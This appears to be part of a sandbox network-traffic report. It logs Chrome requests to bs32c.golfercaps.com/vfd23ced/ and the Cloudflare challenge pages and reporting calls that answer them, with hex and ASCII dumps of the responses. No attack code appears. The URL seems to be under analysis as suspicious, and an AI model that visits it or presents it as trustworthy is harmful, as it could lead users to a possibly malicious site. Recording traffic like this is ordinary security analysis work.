                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 42 75 4d 6d 52 5f 49 6f 52 58 32 4e 72 42 5a 51 4f 4f 6e 48 4a 32 38 57 4c 47 4b 30 48 41 66 6e 46 69 54 47 79 73 6f 6e 57 7a 76 7a 76 6c 74 6c 48 70 50 59 65 53 75 32 6d 63 59 62 4b 69 67 58 70 48 33 49 4e 42 76 56 42 75 68 59 41 5a 54 41 47 71 50 54 68 58 41 33 35 78 56 58 38 44 6b 72 4f 36 5f 4e 73 62 54 7a 6d 4d 69 55 67 6b 33 45 71 4b 59 6d 72 50 50 47 30 51 7a 49 4e 6c 6c 47 62 55 48 64 65 35 64 78 42 72 4c 4c 35 49 70 48 77 79 7a 4f 71 50 48 67 50 32 6e 51 79 43 55 4c 41 67 77 4d 34 63 35 6d 6b 72 46 47 35 6c 58 34 73 6d 7a 51 44 36 4e 74 47 77 56 59 34 65 69 42 51 48 57 5f 68 67 67 6e 79 51 44 44 2e 57 5f 54 32 64 33 69 5a 6f 44 7a 41 77 62 44 5f 5f 36 79 44 6b 32 79 5a 4d 46 37 56 6f 6b 46 33 4f 41 44 35 71 47 5f 2e 30 6f 65 43 49 4c 46 56 39 41
                                                                  Data Ascii: BuMmR_IoRX2NrBZQOOnHJ28WLGK0HAfnFiTGysonWzvzvltlHpPYeSu2mcYbKigXpH3INBvVBuhYAZTAGqPThXA35xVX8DkrO6_NsbTzmMiUgk3EqKYmrPPG0QzINllGbUHde5dxBrLL5IpHwyzOqPHgP2nQyCULAgwM4c5mkrFG5lX4smzQD6NtGwVY4eiBQHW_hggnyQDD.W_T2d3iZoDzAwbD__6yDk2yZMF7VokF3OAD5qG_.0oeCILFV9A
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 35 2e 2e 46 55 50 6b 77 6f 4f 78 52 4c 6f 52 6f 39 4d 69 33 64 33 5a 35 4b 53 46 34 6d 6a 51 4c 5f 66 4f 32 6a 54 69 50 35 62 58 6e 54 58 57 42 53 42 72 57 74 30 72 57 62 4d 71 5a 72 54 72 41 4a 6d 41 34 41 5a 69 52 6e 53 70 41 47 4d 33 78 70 73 5f 7a 6c 41 56 32 79 47 53 34 4c 6a 70 30 53 6a 45 48 58 42 4d 6e 32 64 38 73 4c 32 64 70 42 67 66 44 45 58 32 68 46 77 46 44 51 36 33 4a 42 45 45 67 6a 72 66 46 6e 79 2e 4f 6b 78 70 4d 45 4e 36 6e 79 55 49 76 50 46 54 75 6d 61 36 73 47 67 74 6a 70 50 6f 74 33 34 74 6e 5a 45 32 38 47 69 56 54 59 48 65 41 4c 71 75 56 48 79 2e 53 45 46 41 55 46 6a 46 42 33 52 74 69 33 4c 70 53 52 77 47 57 6b 6c 4e 47 43 66 6e 52 39 59 6a 73 75 4d 49 65 4c 30 61 66 69 66 5a 39 38 4b 78 54 53 61 65 48 36 4b 62 66 6b 61 47 7a 38 70 34
                                                                  Data Ascii: 5..FUPkwoOxRLoRo9Mi3d3Z5KSF4mjQL_fO2jTiP5bXnTXWBSBrWt0rWbMqZrTrAJmA4AZiRnSpAGM3xps_zlAV2yGS4Ljp0SjEHXBMn2d8sL2dpBgfDEX2hFwFDQ63JBEEgjrfFny.OkxpMEN6nyUIvPFTuma6sGgtjpPot34tnZE28GiVTYHeALquVHy.SEFAUFjFB3Rti3LpSRwGWklNGCfnR9YjsuMIeL0afifZ98KxTSaeH6KbfkaGz8p4
                                                                  2024-12-30 21:42:16 UTC781INData Raw: 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 23 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 23 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 6c 69 63 65 28 30 2c 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20
                                                                  Data Ascii: _cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?')
                                                                  2024-12-30 21:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449739188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:16 UTC944OUTGET /vfd23ced/ HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:16 UTC1285INHTTP/1.1 403 Forbidden
                                                                  Date: Mon, 30 Dec 2024 21:42:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Resource-Policy: same-origin
                                                                  Origin-Agent-Cluster: ?1
                                                                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  Referrer-Policy: same-origin
                                                                  X-Content-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  cf-mitigated: challenge
                                                                  2024-12-30 21:42:16 UTC923INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6c 77 74 34 70 4f 79 61 6f 36 53 72 6a 34 6a 5a 75 51 66 78 2f 6c 33 49 71 59 34 6f 68 46 30 33 67 62 32 38 77 6d 77 6f 34 77 64 63 35 4c 56 75 48 63 69 2b 46 58 59 54 62 46 62 51 43 74 31 2b 69 73 56 44 54 37 48 67 62 4a 2b 36 4e 38 4b 79 34 2f 46 75 32 37 4e 4e 6b 48 70 4f 4b 5a 35 76 48 48 6e 57 66 64 5a 65 31 42 41 3d 24 53 4a 4e 2f 42 52 64 69 5a 4c 78 37 6d 77 71 79 39 4a 56 35 45 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                  Data Ascii: cf-chl-out: lwt4pOyao6Srj4jZuQfx/l3IqY4ohF03gb28wmwo4wdc5LVuHci+FXYTbFbQCt1+isVDT7HgbJ+6N8Ky4/Fu27NNkHpOKZ5vHHnWfdZe1BA=$SJN/BRdiZLx7mwqy9JV5EA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 32 33 62 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                  Data Ascii: 23b0<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                  Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 79 72 6f 39 71 32 63 79 4a 58 7a 59 72 4b 74 4d 64 79 38 37 39 51 72 47 68 65 41 79 37 71 53 73 58 39 7a 4f 6a 34 55 58 48 63 7a 78 36 4d 63 66 43 44 5f 78 4f 69 77 70 46 44 38 69 66 6b 78 6e 5a 71 4a 71 61 6b 39 50 70 63 56 63 6b 48 37 67 4b 59 59 4a 69 54 7a 33 52 5a 57 38 4f 5a 69 63 42 35 6a 79 2e 5a 71 4a 55 68 74 7a 33 6b 78 71 41 6a 36 4b 37 76 6e 35 56 7a 7a 4a 61 48 74 68 5f 4c 66 33 69 6d 69 4c 35 74 59 38 4b 54 6a 70 39 37 33 50 4d 57 5f 75 74 54 36 75 78 4b 6f 6f 56 61 4a 6a 51 4a 47 6e 43 5a 50 47 5f 72 64 47 44 4a 46 44 35 43 4f 64 66 79 6b 64 48 6a 51 44 57 38 76 5f 51 46 65 59 6b 59 66 62 31 38 4c 42 2e 66 42 64 2e 5f 56 62 4d 4d 4c 5f 46 31 68 77 6c 73 7a 62 37 4c 7a 72 43 4e 33 58 49 66 30 33 78 69 31 67 54 56 52 33 63 30 69 53 31 50 45
                                                                  Data Ascii: yro9q2cyJXzYrKtMdy879QrGheAy7qSsX9zOj4UXHczx6McfCD_xOiwpFD8ifkxnZqJqak9PpcVckH7gKYYJiTz3RZW8OZicB5jy.ZqJUhtz3kxqAj6K7vn5VzzJaHth_Lf3imiL5tY8KTjp973PMW_utT6uxKooVaJjQJGnCZPG_rdGDJFD5COdfykdHjQDW8v_QFeYkYfb18LB.fBd._VbMML_F1hwlszb7LzrCN3XIf03xi1gTVR3c0iS1PE
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 75 42 71 4a 4d 54 48 2e 53 44 31 55 4a 4d 46 58 77 4e 64 41 36 57 77 78 4d 37 4c 30 66 32 76 46 41 7a 54 36 55 67 39 36 54 43 57 61 6c 50 42 59 46 56 4a 42 4e 44 77 4b 6d 42 4c 4a 41 69 62 70 54 70 72 6f 7a 67 31 34 2e 74 5a 70 53 6b 70 55 46 37 56 32 45 74 42 39 33 4a 71 59 76 43 4d 5f 72 31 39 4d 48 7a 4c 42 4a 48 76 6e 65 61 38 4d 6c 6d 5f 43 65 54 54 61 47 73 62 59 76 6a 67 65 75 34 62 76 47 44 55 63 54 53 46 64 35 77 52 70 68 76 39 79 77 6b 68 69 79 43 49 4d 49 35 35 36 59 31 38 30 6a 52 63 62 45 6f 74 55 69 6b 63 76 69 78 63 6e 6c 50 54 4c 50 36 6b 31 6a 56 4e 33 6f 61 46 6c 56 66 48 49 47 51 64 6f 68 61 39 5f 62 6d 70 56 6e 75 7a 78 69 75 61 56 47 67 5f 78 66 30 65 34 53 6a 37 73 61 43 32 46 78 57 68 54 57 77 4b 66 38 41 33 6e 6f 74 77 73 48 30 50
                                                                  Data Ascii: uBqJMTH.SD1UJMFXwNdA6WwxM7L0f2vFAzT6Ug96TCWalPBYFVJBNDwKmBLJAibpTprozg14.tZpSkpUF7V2EtB93JqYvCM_r19MHzLBJHvnea8Mlm_CeTTaGsbYvjgeu4bvGDUcTSFd5wRphv9ywkhiyCIMI556Y180jRcbEotUikcvixcnlPTLP6k1jVN3oaFlVfHIGQdoha9_bmpVnuzxiuaVGg_xf0e4Sj7saC2FxWhTWwKf8A3notwsH0P
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 55 76 79 39 6c 62 78 55 74 75 63 56 38 41 4f 7a 2e 69 45 4a 5a 38 59 64 69 62 41 75 77 48 6b 57 68 74 5f 53 57 49 33 4c 70 58 4f 4a 4f 56 61 31 58 79 39 64 46 63 69 42 41 52 37 32 47 37 57 54 4a 59 2e 42 74 49 65 63 5f 53 67 48 34 6d 33 72 72 35 48 55 35 38 37 55 52 42 74 49 35 56 6c 6f 6d 50 2e 44 51 7a 34 55 2e 45 68 36 31 42 5a 43 75 49 77 78 75 53 4a 4d 6c 4f 46 79 76 65 6b 77 67 4e 6e 5a 35 30 43 42 76 33 45 6c 70 6c 49 6c 72 73 4b 4a 41 41 63 33 4a 54 56 47 44 38 33 41 57 30 42 39 33 53 6b 4c 58 52 72 56 4d 7a 67 55 64 71 38 78 4e 39 2e 6e 66 31 70 63 59 44 66 32 55 51 37 7a 6c 31 4b 48 73 56 6d 61 76 57 6d 4b 48 42 4e 64 62 6e 73 37 79 31 2e 50 53 72 70 71 34 53 5a 49 6c 33 62 6a 6b 69 30 57 47 48 30 6e 41 58 64 70 37 77 4e 76 72 56 7a 38 45 51 38
                                                                  Data Ascii: Uvy9lbxUtucV8AOz.iEJZ8YdibAuwHkWht_SWI3LpXOJOVa1Xy9dFciBAR72G7WTJY.BtIec_SgH4m3rr5HU587URBtI5VlomP.DQz4U.Eh61BZCuIwxuSJMlOFyvekwgNnZ50CBv3ElplIlrsKJAAc3JTVGD83AW0B93SkLXRrVMzgUdq8xN9.nf1pcYDf2UQ7zl1KHsVmavWmKHBNdbns7y1.PSrpq4SZIl3bjki0WGH0nAXdp7wNvrVz8EQ8
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 6a 75 47 69 45 74 77 6b 59 6f 4d 39 70 30 55 67 47 6c 67 2e 4b 6e 47 4d 55 66 4b 66 71 4d 64 53 64 5f 78 4f 45 66 32 38 37 59 43 51 53 35 68 64 47 67 41 6b 66 54 66 2e 68 73 4e 62 41 49 71 59 4c 52 5a 53 77 71 70 34 33 45 79 36 34 66 64 32 65 74 36 59 35 38 73 67 4f 63 67 64 45 58 42 34 44 6d 56 64 55 31 65 6f 55 37 50 4f 34 58 5f 55 33 42 74 74 43 30 56 57 4e 65 69 63 4b 6e 5f 6f 35 75 4b 5a 47 6c 6e 55 41 62 64 4c 6e 6b 52 64 41 50 52 42 50 33 49 47 36 2e 68 73 72 76 33 64 6d 4f 48 36 43 56 4a 74 43 63 52 59 7a 79 75 64 59 76 69 44 32 48 31 6e 30 71 35 46 47 72 30 76 57 34 50 37 4f 71 78 7a 7a 56 74 41 64 38 64 76 73 79 37 4d 67 30 54 69 4e 75 2e 64 52 4f 56 33 34 32 50 39 46 59 48 38 33 4c 71 63 34 54 35 50 31 46 62 74 53 41 6e 4f 72 5a 59 76 5a 56 6e
                                                                  Data Ascii: juGiEtwkYoM9p0UgGlg.KnGMUfKfqMdSd_xOEf287YCQS5hdGgAkfTf.hsNbAIqYLRZSwqp43Ey64fd2et6Y58sgOcgdEXB4DmVdU1eoU7PO4X_U3BttC0VWNeicKn_o5uKZGlnUAbdLnkRdAPRBP3IG6.hsrv3dmOH6CVJtCcRYzyudYviD2H1n0q5FGr0vW4P7OqxzzVtAd8dvsy7Mg0TiNu.dROV342P9FYH83Lqc4T5P1FbtSAnOrZYvZVn
                                                                  2024-12-30 21:42:16 UTC930INData Raw: 6c 47 69 6f 6c 63 4d 22 7d 3b 76 61 72 20 63 70 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 63 70 6f 2e 73 72 63 20 3d 20 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 62 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 63 68 6c 5f 70 61 67 65 2f 76 31 3f 72 61 79 3d 38 66 61 35 33 32 65 30 62 38 39 66 34 32 31 63 27 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 23 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 23 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 77 69 6e
                                                                  Data Ascii: lGiolcM"};var cpo = document.createElement('script');cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8fa532e0b89f421c';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;win
                                                                  2024-12-30 21:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.44974135.190.80.1443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:16 UTC549OUTOPTIONS /report/v4?s=ulQbx3OJP6nXx0BIib9N6HdYIXGwmIVjIZHatCrEt7PC8cmZtHV4TtwWz6AtA1mmEEcTrKHtBQ1kcsFdjeun6Wt%2FDkRYhOOA5nVQOZ4E3G%2Bw4ikIhs847y6JkcwNyzGV8q8Zld6Suw%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Access-Control-Request-Method: POST
                                                                  Access-Control-Request-Headers: content-type
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:16 UTC336INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  access-control-max-age: 86400
                                                                  access-control-allow-methods: OPTIONS, POST
                                                                  access-control-allow-origin: *
                                                                  access-control-allow-headers: content-length, content-type
                                                                  date: Mon, 30 Dec 2024 21:42:16 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449743188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:17 UTC1003OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8fa532e0b89f421c HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/?__cf_chl_rt_tk=.t4_fTJ6..fLu83eCFtwRHaH9sSWM82a2A3hSooL1N8-1735594936-1.0.1.1-2NnitAHUkIRWasCED.LdyHmLvy_cTl17DXqwUbIw_u0
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:17 UTC879INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:17 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 99935
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8g19IHy8uJzIstyPvnkGbO9DX1yB%2Fu68kGjcmZL3ceBNA3Hir6znzYNAvXGNmmo7j2Pwgz7KvgMfJsfKI88wfkA9eaBgCVhWX70Vpoz5gaOLZuKaS4%2BbQMWiGqU8n%2FQLFpK2Y2vvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa532e50cf043b8-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1584&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1603&delivery_rate=1793611&cwnd=231&unsent_bytes=0&cid=e00bdeaa449155e6&ts=148&x=0"
                                                                  2024-12-30 21:42:17 UTC490INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 74 72 75 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 7d
                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=true;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"}
                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 25 32 37 25 33 45 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 6e 73 75 70 70 6f 72 74 65 64 25 33 43 25 32 46 61 25 33 45 25 32 30 61 6e 64 25 32 30 75 6e 61 62 6c 65 25 32 30 74 6f 25 32 30 63 6f 6d 70 6c 65 74 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 2e 25 32 30 54 72 79 25 32 30 61 25 32 30 64 69 66 66 65 72 65 6e 74 25 32 30 62 72 6f 77 73 65 72 25 32 30 6f 72 25 32 30 6d 61 6b 65 25 32 30 73 75 72 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 70 64 61 74 65 64 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 6e 65 77 65 73 74 25 32 30 76 65 72 73 69 6f 6e 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67
                                                                  Data Ascii: ported_browsers%27%3Ebrowser%20is%20unsupported%3C%2Fa%3E%20and%20unable%20to%20complete%20verification.%20Try%20a%20different%20browser%20or%20make%20sure%20your%20browser%20is%20updated%20to%20the%20newest%20version.","testing_only_always_pass":"Testing
